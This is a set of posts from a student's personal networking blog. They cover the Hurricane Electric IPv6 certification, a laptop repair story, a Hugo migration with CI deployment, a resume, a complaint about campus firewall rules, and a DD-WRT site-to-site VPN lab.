[{"content":"Going into the networking and IT industries, one of the common things you\u0026rsquo;re met with is certificates. Some of the more common ones include the CCNA and the CompTIA A+ certifications, with some of the more niche and situation-specific including PCNSA, CCNP, and CompTIA Security+ certifications. My first, however, was none of those. It was the Hurricane Electric IPv6 certificate, and it was by complete accident.\nBackground I first stumbled across Hurricane Electric through their IPv6 tunnel broker program in early 2024, where they would allocate a routed /48 to you for completely free. All you needed was a routed IPv4 address that would respond to pings. While I was never able to get it successfully set up, likely due to me still learning OPNsense at that time.\nAs one does on an inherently technical in nature webpage, I clicked around and found they had an IPv6 certification program. Naturally, I let my curiosity take control to see how far I could get with it without having done any research into it or even a routed IPv6 address. After achieving Newbie status easily, I was unable to move past that due to the requirement of having to access from an IPv6 address. With me still being in the middle of the semester, I decided I\u0026rsquo;d put a pin in that until the summer.\nPicking it back up The date is now January 12th, 2025. It\u0026rsquo;s the night before the spring semester of classes start, and I\u0026rsquo;m figuring out what devices have IPv6 addresses with my cat to my side. Out of nowhere, I remember that I was looking into Hurricane Electric for getting IPv6 back where I used to live, and how I was trying to get through what I thought was a connectivity quiz. As such, I pull it back up and see how much further I can get with it.\nExplorer The enthusiast tier could mostly be described as understanding what an IPv6 address looks like. The difficult part of this tier for me was due to my lack of IPv6 connectivity when I initially tried to do this. I deemed it not important enough turning on my phone\u0026rsquo;s hotspot on just to get past this and just made a mental note for me to do that whenever I was on my hotspot. Yeah that never happened, or else this would be published in June.\nAfter connecting with an IPv6 address (still not through Hurricane Electric\u0026rsquo;s tunnel), I answered the quiz covering extremely basic diagnostics and confirming I know what an IPv6 address looks like.\nEnthusiast This step involved having a website that had IPv6 connectivity. However, I\u0026rsquo;ve had one for the past 3 years: https://www.monicarose.tech. While I wish I could say I set this blog up with one of the goals to be achieving an IPv6 certificate, the title of this post is about how I got a certificate by accident.\nQuestions were extremely leading, pushing you toward using IPv6 alongside some hilarious multiple choice questions, which was trivially easy to just click through and move on.\nAdministrator This step was marginally more difficult for the technical aspect of it, which was making sure if I had a working mail server that had IPv6 connectivity. And for the past 2 years, that was a yes for me. If you\u0026rsquo;ve sent an email to an @monicarose.tech email address, that was sent to a self-hosted mail server. 
For the homelabbers out there who are hesitant to use cloud providers, it's entirely possible your ISP allows SMTP traffic, both inbound and outbound. I have friends who run their own mail servers from their residential networks without any issues. For those whose ISP has blocked inbound SMTP, it's possible you can get away with using a Gmail or Outlook email address, but that much is an exercise for the reader.

By the time I had configured the mail server, I had largely moved on from addressing servers by IP address and had started using DNS to address things as much as possible. Outside of this certification, I personally feel that getting people to address things by DNS rather than by IP address is one of the biggest hurdles for IPv6 adoption, since it's either not common knowledge that DNS records can point to private IPv4 addresses, or some DNS resolvers refuse to serve private IPv4 addresses. In my experience, OPNsense (and presumably pfSense by extension) blocks resolution of DNS queries that result in a non-routed IP address, but this is easy to disable and, in my opinion, poses little security risk.
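For the curious, on a stock OPNsense box that behavior comes from Unbound's DNS rebinding protection, which strips private addresses out of answers. A minimal sketch of the relevant knobs in Unbound's own config syntax (OPNsense exposes the same settings through its GUI):

```
server:
  # Ranges that rebind protection strips from upstream answers:
  private-address: 10.0.0.0/8
  private-address: 172.16.0.0/12
  private-address: 192.168.0.0/16

  # Exempt your own zone so its records may resolve to private
  # address space anyway:
  private-domain: "monicarose.tech"
```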
As far as the questions went, most of them surveyed my experience with the certification process, with one, ahem, "technical" question. At risk of repeating myself, it was trivially easy to click through and move on.

## Professional

While not entirely difficult for me, this might be the stumbling block for people wanting to take this test at home. For full transparency, I used my blog's website for most of this process, which is hosted on a $5/month server from Linode. They made it extremely easy for me to change the rDNS for that IPv6 address, but if this is being done in a homelab environment, I fully acknowledge it may be flat-out impossible for some people. I didn't look into whether Hurricane Electric would let me change the rDNS on the range they allocated to me.

With that acknowledgement out of the way: hypothetically, if I hadn't already changed the rDNS, it would've taken a couple of clicks and entering monicarose.tech, possibly with a few minutes of waiting for any DNS caches to expire. Since I had already completed that while setting up my mail server, I could once again validate my rDNS record and continue on to the questions.
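Verifying the PTR record is a one-liner; dig's -x flag builds the reverse ip6.arpa query for you. The address below is a placeholder, so substitute your own:

```sh
# The answer should be the hostname you configured, e.g. monicarose.tech.
dig +short -x 2600:3c00::f03c:91ff:fe24:a414
```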
The questions, once again, included surveying about the certification process, notably whether I had any issues configuring IPv6. Seeing as I've yet to configure the Hurricane Electric tunnel on OPNsense, it's fairly safe to say that yes, I have had some trouble. That being said, my apartment is using IPv6 with OPNsense and I've had little to no issues, even being able to request a /56 and subnet that out.

## Guru

If you've gotten past the rDNS part successfully, congrats! You can most likely coast through the technical parts from here. Unless your DNS provider itself somehow doesn't have IPv6, you can likely click past this just fine, including, yes, the questions.

## Sage

This was by and large the most difficult part for me, mostly because the questions up to this point had been "how do you feel about the certification process so far" and I had already done the hard technical work.

As I alluded to in the Administrator section, this tier was heavily centered around resolving IPv6 addresses in DNS, including knowing some of the major authoritative domains and how to query domains and subdomains. If you aren't familiar with the terms IPv6 glue or glue records, then you're probably going to struggle a bit here.
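If glue records are new to you, you can see them in action by asking a TLD server for a delegation directly. The server name below is a placeholder for whatever the first query returns:

```sh
# Find the authoritative servers for the .tech TLD...
dig +short NS tech.

# ...then ask one of them for the delegation. Glue, if present, shows
# up in the ADDITIONAL section as A/AAAA records for the nameservers.
dig @ns1.example-tld-server.tech monicarose.tech NS +norecurse
```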
Personally, I had to retake it a few times, though my past experience with diagnostics, including a labbing server that had IPv6-related issues for an unknown amount of time, aided me dramatically. Since these questions aren't surveying your experience but actually testing you, there are correct answers. If you were planning on taking this certification, you probably would've reviewed some of the lectures Hurricane Electric has on their certification website. But if you went into this completely blind like I did, there are no repercussions for retaking the test multiple times, as what's tested is just the Sage tier questions.

## Conclusion

Normally, it is heavily advised to study for the certifications you're jumping for. That absolutely holds true here, especially given how difficult setting up everything it asks for can be. This process isn't an overly expensive one by any means. My domain, monicarose.tech, costs me roughly $50/year, with a cloud server able to do web and mail hosting at about $5/month. I'll fully acknowledge that I'm on the upper end of how much this could cost, especially since you can get domains for as cheap as $1/month if you don't care about the name or the top-level domain.

However, if you approach it the way I did, wanting to set things up as completely as possible, then as long as you have IPv6 access it doesn't hurt to be as IPv6-ready as possible. Even if you only get up to the Professional tier, what you've shown along the way is that you're aware IPv6 is very much a thing and have set up web and mail servers to be compatible with it. Even if it doesn't net you a certificate, being able to show that you can properly configure services around IPv6 carries some weight.

This IPv6 certificate will likely be one of the ones that sits lower on my resume, but that's because I'm already planning on getting CyberOps Associate and CCNA certified in the relatively near future, and the CCNA especially shares some elements with the HE IPv6 certificate.

---

# My Framework laptop paid itself off, thanks to my stupidity

https://www.monicarose.tech/2025/01/my-framework-laptop-paid-itself-off-thanks-to-my-stupidity/

How many of you have heard of Framework, the company that puts right to repair first? Some people I know who have seen one, whether online or in person, have called the modularity and repairability a party trick with nothing meaningful behind it, deemed it overpriced, or complained about the 3:2 aspect ratio screen. But what if I said that the first two points - the modularity being a party trick and the price - just need time to prove their potential? Well, let me tell you a story from March 2024 about how my stupidity and haste paid mine off with one mistake.

## Setting the Scene

As part of my duties for my job, I had to reset a bunch of switches and routers back to factory defaults so that they could be used for networking classes. These devices, like a lot of enterprise networking gear, are driven by a serial console, so they need to be managed from a separate computer. Unless there are multiple free USB ports for multiple USB-to-serial adapters, or a computer has multiple serial controllers built in, it's not uncommon for one computer to manage only one device at a time. The computers being used to reset this equipment could not be connected to the lab's network due to their age or lack of wifi, requiring me to have my laptop pulled up with the stuff I needed for work. All of this added up to me having multiple computers in front of me.

One quiet Thursday morning right before spring break, I was continuing to reset these switches. I had just reset a switch, with my laptop nearby to monitor for possible upcoming appointments, and went to move it to the pile of reset equipment so that I could later set up the pods needed for the students. The end of my shift was near, and after my one class for the day, I was ready to go home for the week-long break. In my haste, I picked up a Catalyst 2960 with a less-than-ideal grip, and I dropped the switch onto my laptop.

## The Initial Panic

At first glance, the damage looked bad. I had cratered my delete key and, in my panic, I assumed that I had damaged the motherboard and/or slightly punctured the battery. The light surrounding the power button had shut off, suggesting I had damaged some traces, possibly the button itself. At this point, I had concluded that my laptop was effectively totaled and possibly a fire hazard. Like most people, one of the major reasons I bought a Framework laptop was the repairability. In fact, I've done multiple repairs on this laptop before, some voluntary, like upgrading my storage or getting more memory, and some involuntary, like replacing the keyboard after my cat ripped off some keys. However, there were some factors contributing to my warped perception of the damage:

1. I needed my laptop for a class that started an hour after I was supposed to clock out.
2. Spring break was fast approaching, and I would be going home the next day, which meant ordering parts would be complicated since I didn't know how long delivery would take.
3. I needed my laptop for work.

## A Fresh Set of Eyes

After leaving my laptop in my room and going to class (the battery was almost dead), I was able to get a fresh set of eyes and reassess the damage. Immediately, I was able to put a lot of my concerns to rest, as I discovered that the impact area had an expansion card underneath it, meaning that at most, the total damages would've been a new keyboard and a new USB-C expansion card. As luck would have it, even though the crater was rather large, the expansion card could still be removed, albeit with some effort. As a bonus, the card came out mostly unscathed, save for a slight dent. But the question remained: what about the key that had taken such a heavy impact? Surely that portion of the keyboard, or at the very least that key, was damaged, right?

*(video of my reaction)*

If my reaction wasn't enough of a hint, I wasn't expecting that one. I had a fully functional laptop despite the full weight of an enterprise-grade switch being dropped onto the delete key.

## The Damages

After some initial troubleshooting, I concluded that the only damage was cosmetic, with the keyboard taking the brunt of it. The bulging dent in the chassis could be massaged back into place, other expansion cards could be used in the affected slot, and the expansion card that had been in that slot was still functional. The only thing I ultimately ended up replacing was the input cover, running me a grand total of $100.

If I bought a Framework laptop for the repairability and I could get the keyboard standalone, why didn't I? The short answer is that I didn't feel like spending an hour of my life driving screws. The long answer is that, in addition, I thought I had damaged my laptop further when I upgraded to a 61Wh battery the week before. As I later found out, the symptom I was seeing was one of the quirks of that mainboard, an 11th-gen Intel board from wave 3, and it just happened to coincide with the upgrade. In other words, I bought the laptop while it was still effectively a beta product, and the issue only showed itself as a red herring.

## The Takeaways

Whenever these relatively notable events happen, I like to think about the takeaways. While this happened in March 2024, I didn't start writing this post until November 2024, and in that time I've had a chance to reflect. I think this series of unfortunate events boils down to three key points:

1. A device meant to be repaired may cost more up front, but mistakes on your off days will help pay that off in the long run.
2. In the heat of the moment, it is trivially easy to make a situation seem worse than it actually is.
3. Should something get damaged, the worst thing you can possibly do is not test it.

---
# I Migrated My Blog to Hugo

https://www.monicarose.tech/2024/10/migrated-blog-to-hugo/

In the span of about 3 days, I successfully migrated my blog to use Hugo as my backend. Hugo (no, not the 2011 movie) is a static site generator that lets you write Markdown files and then creates HTML files from them. As you might guess from that blurb, Hugo itself does not host the content, but rather adapts the content to a web-friendly format.

## Reasons

There are a few major reasons why I jumped to Hugo from my WordPress-based website, which can be summarized in four key points: speed, backups, flexibility and freedom, and potential liability.

### Faster

Quite frankly, I don't use a fraction of the features that WordPress offers. My blog has no shop associated with it, comments have been disabled for a long time, and I was barely using any plugins. And while WordPress is feature-rich, that comes with the consequence of being a heavyweight in system load, especially given that I'm hosting on a Nanode from Linode with 1 core and 1 GB of RAM.

In addition to the user-facing performance benefits, there's also the admin experience. For me to log in, draft up a post, and publish it, the process was too convoluted for someone who is a one-man army. If I logged in from a different location or even a different tab, who knows what version I was getting or what version would be saved. This further contributed to writer's block, where I'd have to remember where I was and what I wanted to write about.

### Backups

Because everything is a Markdown file, everything can be stored in a git repo. While having the entirety of my website in a git repo has additional benefits that will be outlined later, the ability to utilize the robustness of git means that I get baked-in revisions and I can store it wherever I want.

### Freedom and Flexibility

WordPress runs on top of a LAMP stack: Linux, Apache, MySQL, and PHP. Having these four distinct components comes with benefits for high availability, load balancing, and manageability, among other things. The double-edged sword of that last point is how difficult it is to manage. For a simple website, it's not uncommon for all four components to run on the same server, often with low system resources available, which means it's easy for one component to accidentally kill another. While I have uptime monitoring through Uptime Robot and Uptime Kuma, there were multiple situations where there was partial functionality, or the only working page was the index page, resulting in false positives.

Further, since these files are pregenerated HTML, CSS, JavaScript, and pictures, more flexibility is offered in where I store them, how I serve them, and where I serve them from. I may presently be using Apache2 on a 1GB Nanode to store and serve the files, but there is nothing stopping me from storing the files in a Backblaze B2 bucket, served using Caddy on a DigitalOcean droplet, and the change would be completely transparent to the end user.

The flexibility of serving statically generated HTML files also means I was able to add pages that deviate from the standardized template, the very first example being [a resume page](https://monicarose.tech/resume), permitting me to keep a consistently up-to-date and easy-to-modify resume in the future. That, combined with the fact that I already use Markdown-based files for my notes in class, means it's quick for me to draft up a professional-appearing post.

### Automattic/WP Engine Drama

I had been looking at migrating my blog to something that allowed me to write Markdown-based content, with some naive attempts at on-the-fly Markdown-to-HTML conversion, but I never got the results I was looking for. However, when the WordPress Foundation changed their trademark policy on how you could use the terms "WP" or "WordPress", specifically calling out WP Engine as an example of infringement, using any form of WordPress felt like a liability, and that became the driving force that pushed me to migrate away.

## Prep

To prepare for migrating, I set up a git repo on my personal Gitea instance to provide a place to push my content to. After an initial commit, I set up a container on my Proxmox server and configured it to mirror my public-facing web server, substituting the LAMP stack for Apache and Hugo. After doing some quick research, I found that Drone is a commonly used CI/CD pipeline with Gitea.

After deploying Drone and a basic pipeline, including one of the many Hugo plugins for Drone and an rsync plugin for Drone, I refined the pipeline as much as I could until I got a successful deployment.
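I won't reproduce my exact pipeline here, but a minimal Drone pipeline in the same spirit looks something like the sketch below. The image names are illustrative stand-ins; check the Drone plugin registry for the ones you actually want:

```yaml
kind: pipeline
type: docker
name: deploy-blog

steps:
  # Build the site; the generated HTML lands in public/
  - name: build
    image: hugomods/hugo
    commands:
      - hugo --minify

  # Push the generated files to the web server over SSH
  - name: deploy
    image: drillster/drone-rsync
    settings:
      hosts:
        - monicarose.tech
      user: mhanson
      source: public/
      target: /var/www/monicarose.tech/
      key:
        from_secret: deploy_ssh_key
```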
This allowed me to focus more on migrating the content and learning how to integrate static content like images. To migrate the content, I discovered wp2hugo, a tool written in Go that takes your WordPress export and adapts it into Markdown files. Committing these, I finally had a baseline to push to production.

## Deploying to Production

To deploy to production, I knew there was one major obstacle I'd have to overcome. In addition to an iptables-based firewall on the VM itself, I'm utilizing Linode's firewall rules. As my Drone instance is deployed in my homelab, I had to work around a dynamic IP. Since Linode's firewall, to the best of my knowledge, doesn't let me reference a DNS name in a rule, I wrote a simple Python script and a Docker container to update the firewall. By no means is it perfect, but it should be good enough for a basic implementation.
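The script isn't much more than "resolve the homelab's dynamic DNS name, then push the resulting address into the firewall via Linode's API." A rough sketch under those assumptions - the hostname, firewall ID, and rule label are placeholders, and the exact rule schema is worth double-checking against Linode's API docs:

```python
import os
import socket

import requests

TOKEN = os.environ["LINODE_TOKEN"]       # Linode personal access token
FIREWALL_ID = 12345                      # placeholder firewall ID
DDNS_NAME = "home.example.com"           # placeholder dynamic DNS name
API = f"https://api.linode.com/v4/networking/firewalls/{FIREWALL_ID}/rules"
HEADERS = {"Authorization": f"Bearer {TOKEN}"}

def update_rules() -> None:
    # Resolve the homelab's current public IPv4 address.
    addr = socket.gethostbyname(DDNS_NAME) + "/32"

    # Fetch the current rule set, rewrite the matching inbound rule,
    # and push the whole rule set back.
    rules = requests.get(API, headers=HEADERS, timeout=10).json()
    for rule in rules.get("inbound", []):
        if rule.get("label") == "allow-homelab":   # placeholder label
            rule["addresses"]["ipv4"] = [addr]
    requests.put(API, headers=HEADERS, json=rules, timeout=10).raise_for_status()

if __name__ == "__main__":
    update_rules()
```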
After confirming the script worked, I added the SSH key for the CI/CD pipeline, modified the permissions so that elevating to root wouldn't be necessary, and backed up the WordPress website just in case issues occurred. Predictably, issues did occur, particularly around permissions.

While the website shouldn't have any server-side executable code on it, it's still good practice to limit permissions as much as possible. Now with that in mind, let me show this script from my CI/CD pipeline, and you tell me if you see any issues here:

```sh
chown -R mhanson:www-data /var/www/monicarose.tech/
chmod -R 640 /var/www/monicarose.tech/
```

By a show of hands, how many of you caught the error? Still don't see it? Because for about 20 minutes, I didn't catch it. I feel as though Unix permissions are fairly self-explanatory with one exception: a directory needs to be executable for it to be navigable. The more correct syntax is:

```sh
chown -R mhanson:www-data /var/www/monicarose.tech/
find /var/www/monicarose.tech/ -type d -exec chmod 750 {} \;
find /var/www/monicarose.tech/ -type f -exec chmod 640 {} \;
```

To break down the changes, the last two lines use the find command to set the permissions of directories (the second command, using -type d) and files (the third command, using -type f) independently of each other, allowing the directories to be executable and, as a result, navigable.

## Takeaways

Quite frankly, the main takeaway from this migration is to make your development environment mirror production as much as possible. Permissions and ownership issues would've been caught early on if I had taken the time to set up a low-privilege user in my development environment. Between that and taking more time with local testing, I feel as though most of the issues would've been caught early on.

---

# Monica Hanson

https://www.monicarose.tech/resume/

## Work Experience

### Southeast Missouri State University

**Senior Learning Assistant** (January 2024 - Present)

- Assisted students with learning networking topics
- Coordinated teams to lower barriers for help
- Created material to help teach topics
- Wrote programs to automate repetitive tasks
- Trained Learning Assistants on procedures
- Observed Learning Assistants' sessions to provide feedback

## Education

### Southeast Missouri State University

**B.S. Cybersecurity** (August 2022 - Present)

- Expected graduation date: May 2026
- Designed networks implementing good-practice security measures
- Modified programs to protect against common attacks

**B.S. Computer Networking System Administration** (January 2024 - Present)

- Expected graduation date: May 2026
- Set up and deployed highly available Proxmox clusters
- Configured network imaging to automate system deployment

**Computer Science Minor**

## Certifications

- Cisco Certified Network Associate (Verify Status)
- Hurricane Electric IPv6 Sage Rank

## Skills

Windows, Ubuntu Linux, Proxmox VE, TrueNAS Core, OpenVPN, Cloud Computing, TrueNAS Scale, Windows Server, Python, OPNsense, Firewall, Routing, Switching, Subnetting, VLANs, Red Hat Enterprise Linux, Golang, Wazuh, FOG Project

## Featured Projects

**CiscoResetterGo**

- Automates resetting Cisco products over serial, including Catalyst 2960 switches and 4221 routers
- Written entirely in Go, with a web interface utilizing net/http and gorilla/mux
- Primitive default-setting applications

---
# Configure Your Firewalls Correctly: an Open Letter to Sysadmins

https://www.monicarose.tech/2023/08/configure-your-firewalls-correctly-an-open-letter-to-sysadmins/

Imagine this: you're running a web hosting service and you need to connect in to add another client who has specific needs your setup script doesn't account for. You try to connect via SSH, but it hangs. After it hangs, you escape out of the session and reconnect with the verbose flag set. You notice the wrong IP address, and you realize that you set up Cloudflare proxying. So you SSH in to the server using the public-facing IP address, only to find it's still not connecting. You can ping the server just fine, and you can even access the website just fine. Maybe you accidentally banned yourself from accessing the server via SSH. So you log in to your server provider's website and open up the server. You see that your IP isn't banned and the SSH service is running just fine. The variable you didn't account for was where you're logging in from: the network you're connecting from has outbound SSH blocked.

As that opening paragraph suggests, this is a situation I had to deal with when I first transferred to SEMO. The image that I used to deploy multiple WordPress websites used PHP 7.4, and I had to upgrade many of those websites to PHP 8.1. However, I was unable to SSH in to those servers due to a firewall rule on SEMO's network. While I was able to get those servers upgraded to PHP 8.1 that day by logging in through the console, ensuring I had proper backups prior to those upgrades was made drastically more difficult.

## It's not just SSH

Around the same time as running those upgrades, I decided to embark on another project: writing my own Twitch chat bot. Twitch's chat utilizes the IRC protocol, which is usually a plain-text service. Among other things, IRC is still used today for real-time support channels akin to a Discord server. However, when trying to test whether I was able to successfully connect to the server, I kept getting connection-timed-out errors. After generating a GitHub personal access token to push my code to a repository (since outbound SSH was blocked) and running it on my labbing cloud server, I discovered that it worked fine there. Seeing as how widespread IRC is, I tried a generic IRC client on my main computer to see if I could connect to a Twitch chat. The answer was no.

Similarly, around that time I got the idea to try figuring out how to send and receive emails using my own mail server, with the intention of learning how email works at a lower level and what security practices can be put in place for a secure but effective email server. Naturally, this was harder to diagnose, as I was reliant not only on the campus firewall allowing outbound SMTP, but also on the cloud provider's firewall not blocking SMTP and on my configuration being correct. I could rule out my cloud provider's firewall, as I had submitted a ticket to have that restriction removed from my account. Additionally, I was able to confirm I could send emails via Postfix to a Gmail account, which suggested that port 25 was open. However, when trying to use netcat or telnet to connect to the instance, I couldn't access it.

## Determining why the blocks existed

After having experienced those issues and being able to rule out both my computer and the servers as the cause, I did what any sane person does: submit a ticket about the rules. After all, I'm trying to do my job and manage these web servers that clients are paying me for. Two months later, a possible lead turned into pushing me to use the student VPN - a VPN that I am not able to use because my personal machines run Linux and the VPN uses a Windows-exclusive installation method, not to mention that it still wouldn't solve the root issue. Attempting to circle back to the root issue resulted in radio silence. Following up after a month, and discovering yet another blocked service (port 9001, for the Portainer agent), resulted in more radio silence. Following up two months later again (we're now in December, four months after I moved in): still silence. At that point, I escalated it to a Missouri Sunshine request. You can read my post on the Open Information Committee for more details on that, as it's outside the scope of this post. However, in spite of the issue being raised a year ago as of this writing, it still hasn't been addressed.

## Circumvention, Discrepancies, and the Consequences

Out of curiosity, I decided to try changing the SSH port on my labbing cloud server to a different port. Curiously, that worked, suggesting the firewall merely blocks ports, not services. The easiest solution, then, is to change each of the blocked ports to ones that aren't blocked.
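For SSH specifically, that's a quick change on the server. The port number here is just an example, and the drop-in file works on distributions whose sshd_config includes a conf.d directory:

```sh
# Tell sshd to listen on an alternate, unblocked port
echo "Port 2222" | sudo tee /etc/ssh/sshd_config.d/alt-port.conf
sudo systemctl restart sshd

# Then connect with: ssh -p 2222 user@host
```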
Finding which ports were actually usable was facilitated by a script I wrote, Port Knocker, to see what ports were available. Ports 3306, 1433, and 1434 are blocked, which are the ports usually associated with database servers like MySQL and Microsoft SQL. Normally it would be trivial to change the ports they listen on; however, services that depend on a SQL server usually assume the respective default ports, adding a layer of difficulty should you use a different one. Furthermore, you're heavily restricted in using third-party servers like GitHub, as they made the decision to remove password-based authentication in August 2021, favoring git over SSH, or a personal access token if you decide to stick with git over HTTPS.
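The core of a tool like Port Knocker fits in a few lines of Python: attempt an outbound TCP connection to a cooperating server on each port of interest and record which ones complete. A stripped-down sketch - the target host is a placeholder, and something has to be listening on the far end for a port to register as open:

```python
import socket

# Placeholder: a host you control that listens on the ports under test.
TARGET = "labserver.example.com"
PORTS = [21, 22, 23, 25, 80, 443, 1433, 1434, 1723, 3306, 3389, 5900, 9001]

def is_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if an outbound TCP connection to host:port completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port in PORTS:
    state = "open" if is_reachable(TARGET, port) else "blocked/filtered"
    print(f"{port:>5}/tcp: {state}")
```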
Using the aforementioned script, I discovered several discrepancies. For instance, port 22, the port commonly used by SSH, is blocked, but port 23, the port commonly used by Telnet, isn't. Further, port 21, the port commonly used for FTP, isn't blocked either. And while a cynical person might point out that blocking SSH while leaving Telnet and FTP open would allow snooping on data, port 1723, the port used for PPTP, appears to be blocked as well, with the L2TP, IPsec, OpenVPN, and WireGuard ports all left open. Additionally, while SSH is blocked on its default port, you can still use the remote desktop protocol's default port of 3389 or VNC's default port of 5900.

## Hypocrisy

An additional issue in this particular context is the hypocrisy. A couple of SEMO's majors are Computer Networking Systems Administration and Cybersecurity, both of which have a fundamental need to remotely manage networking appliances and servers. Furthermore, a required course for Computer Science, Computer Information Systems, and Cybersecurity is a database class, whose course description reads as follows:

> Basic concepts of database and database architecture. Discussion of entity-relationship and relational database models. Study of the SQL query language. Study of database design methodology.

https://semo.edu/student-support/academic-support/registrar/bulletin/courses/index.php

While it doesn't explicitly call out the database software used, it could be assumed that something akin to MySQL or Microsoft SQL is being used to learn on. As I haven't taken the course, that is purely speculation, but it is a worthwhile detail to mention.

Furthermore, your physical location appears to make a difference: the networks available to you as a student on campus vary depending on whether you're in a dorm building or not, with the latter being more permissive, allowing services like outbound SSH.

## My Plea: Configure Your Firewalls Correctly

If your intent is to block access to external devices, please configure your firewalls consistently and block each of the remote-access ports, including VNC, SSH, Telnet, and RDP. If you wish to block file transfers, don't just block SSH and NFS, but also block FTP and FTPS. Even then, those dedicated to getting access to their external services will find ways around it, such as changing ports or tunneling over a VPN.

I'm not asking for access to computers inside the network from computers outside, but for access to computers outside the network from the inside. To add to it, the inconsistent rules based solely on where you're located on campus make it more difficult to predict what we will be able to access. I'm not asking for no firewall rules, as a firewall is fundamental to our network security. We're not asking to host various services in our dorms, since we agreed in the terms of service we signed that we would not be hosting any type of server on campus. What I'm asking for is for us to be able to use the tools that are available to us and that should be actively practiced, especially if it's part of our major. What I'm asking for are consistent rules across campus. What I'm asking for is to let us work from home in this increasingly work-from-home environment and to keep our hobbies, such as homelabbing and programming.

---
# Site to Site VPN with DD-WRT

https://www.monicarose.tech/2022/11/site-to-site-vpn-with-dd-wrt/

Admittedly, I'm pretty unfamiliar with VPNs, especially with setting up VPNs on routers. I've followed the excellent guide by egc to set up VPNs for my individual clients, such as my desktop and my laptop. However, one of the next logical steps is to learn how to set up a site-to-site VPN with DD-WRT. One of the issues with deploying it right now is that I'm currently an hour away from the other location. While I could easily set up a remote desktop solution with the likes of RustDesk or TeamViewer, it's still responsible to test it first in a virtual environment before deploying it to production.

## The Virtual Environment

To emulate the production deployment as closely as possible, I spun up two virtual machines in VMWare Workstation using DD-WRT build r50906 from 11/18/2022, specifically the x86_64 build. I also ended up using a Kali Linux image and a Windows 11 Development image, both of which were the official OVF files from their respective websites. These would emulate web servers that would confirm connectivity between the two endpoints. In addition to that, I created two host-only network adapters with no DHCP service running. I deliberately chose host-only because I wanted the servers to communicate with each other only through the DD-WRT virtual machines.

| VM | WAN IP | LAN IP | Subnet |
|----|--------|--------|--------|
| DD-WRT Site 1 | 10.0.0.202 | 10.77.77.1 | 255.255.255.0 |
| DD-WRT Site 2 | 10.0.0.94 | 10.75.75.1 | 255.255.255.0 |
| Windows 11 VM | 10.0.0.202 | 10.77.77.91 | 255.255.255.0 |
| Kali Linux VM | 10.0.0.94 | 10.75.75.96 | 255.255.255.0 |

## Promiscuous Mode Nightmares

One of the first hurdles I ran into, and one I was not expecting, was DD-WRT being adamant about using promiscuous mode, which VMWare was very unhappy about. Across both virtual machines and both network adapters per VM, an error about being unable to enter promiscuous mode would get thrown.

While it's plausible I configured something incorrectly, I followed the link provided with the error to solve the issue. The suggested solution was to create a group that had read and write permissions on the virtual network adapters and add myself to that group. After doing just that, it booted without any issues.

## First Time Setup

I would be lying if I said that the setup process was painless, because it was far from it. I spent a good couple of hours just troubleshooting network connectivity issues. Sometimes I would have a connection for 5 minutes, sometimes an IP address wouldn't be given out at all, sometimes it would get an IP address but wouldn't connect to the web interface, sometimes it would cooperate with one VM while the other didn't even want to ping its router; all in all, it was wildly inconsistent. I tried mirroring the same build that I was using on my Netgear routers in my production deployment (r50671), I tried the latest version (as of setting this up, build r50906) in x86, I even tried a pre-made OVF that I found on the DD-WRT forums, none of which worked out.

After enough trial and error with different configurations, I found that, in order for DHCP to assign IP addresses, the DD-WRT VMs needed a bridged connection. As a result, my production LAN served as the WAN for those DD-WRT VMs, which was fine by me, as I could also determine how internet traffic was routed. While there were still some IP assignment issues with the default subnet, these were resolved after assigning the subnets mentioned above.

## Initial VPN Configuration

To begin toying around with VPNs, I followed the DD-WRT OpenVPN configuration guide, using the Windows VM as the machine issuing the profiles and the site 1 router as the OpenVPN server. This was a known-good guide, as it's what I used to deploy my current VPN setup, and it is frequently updated (the last edit was on 11/12/2022, just over a week before this writing). After setting this up, I ensured that the site 2 router could ping the site 1 router and, sure enough, it could. However, not everything was set up yet, as my Kali VM couldn't see the Windows VM, and the Windows VM couldn't see the Kali VM either. That was expected, though, as I was just making sure I could even connect the site 2 router to the site 1 router.

## Uncharted Territory

Note: in this section I'm posting lines from my configuration. If you are following this post as a guide, replace 10.77.77.0 with the subnet of the network running the server and 10.75.75.0 with the subnet of your remote network.

At this point, I needed to route the two sites' traffic to each other. Surprisingly, it wasn't that difficult. Referencing the guide from before, all I needed to do was ensure that the inbound firewall on NAT was disabled on both the client and the server and add some routing statements to the "additional config" section, adding the following lines on the server:

```
route 10.77.77.0 255.255.255.0 vpn_gateway
push "route 10.75.75.0 255.255.255.0 vpn_gateway"
```

Additionally, I needed to add the following line to the "CCD-Dir DEFAULT File" section:

```
iroute 10.75.75.0 255.255.255.0
```

Another option that I did not initially check was changing "Push Client Route" from "Default Gateway" to "Servers Subnet". Missing this caused me to lose internet connectivity on the remote network; after correcting it, internet connectivity was restored.

## Firewall Fun

Now that I had two remote sites set up on paper, it was time to check my work. I tried pinging the Kali VM, with success. With the ping succeeding, I was also able to access the Kali VM's website. The other way around, on the other hand, I was unsuccessful in pinging the Windows VM or accessing its website. I initially suspected a routing issue, so I tried pinging the site 1 router from the Kali VM, with success. Trying to access that router's webpage using its local IP address was just as successful. That eliminated a possible routing issue, so I checked what was going on in the Windows VM.

Initially, I checked the WAMP server running on the Windows VM, as I suspected a configuration issue in the Apache config. While I did end up making a configuration change (in httpd-vhosts.conf, adding `Require all granted`), I doubt that played a significant part. After doing a bit of research, I found that Windows, by default, only accepts incoming network traffic from addresses on the same subnet. While the bodge solution was to just disable the firewall outright, the correct solution would've been to manually add a firewall entry for the server, as Windows didn't prompt me to add a firewall rule on first run, though that may have been due to the firewall profile being set to public. After disabling the firewall, I was able to successfully ping the Windows VM from Kali and access the WAMP server.
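For reference, the less bodge-y fix is a pair of inbound rules scoped to the remote subnet rather than turning the firewall off. Something along these lines, run from an elevated prompt (the rule names are arbitrary, and the port matches the WAMP server):

```
:: Allow ping from the remote VPN subnet
netsh advfirewall firewall add rule name="VPN ICMP" dir=in action=allow protocol=icmpv4 remoteip=10.75.75.0/24

:: Allow HTTP to the WAMP server from the remote VPN subnet
netsh advfirewall firewall add rule name="VPN HTTP" dir=in action=allow protocol=TCP localport=80 remoteip=10.75.75.0/24
```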
## Conclusion

As I found out through the firewall issues, there are plenty of red herrings when setting up something as inherently complex as a site-to-site VPN. The most obvious example of this is the firewall blocking traffic from external subnets, masked behind suspected routing and Apache misconfigurations. In hindsight, I should've tested this with two Linux VMs running web servers, as I'm admittedly not familiar with using Windows as a server.
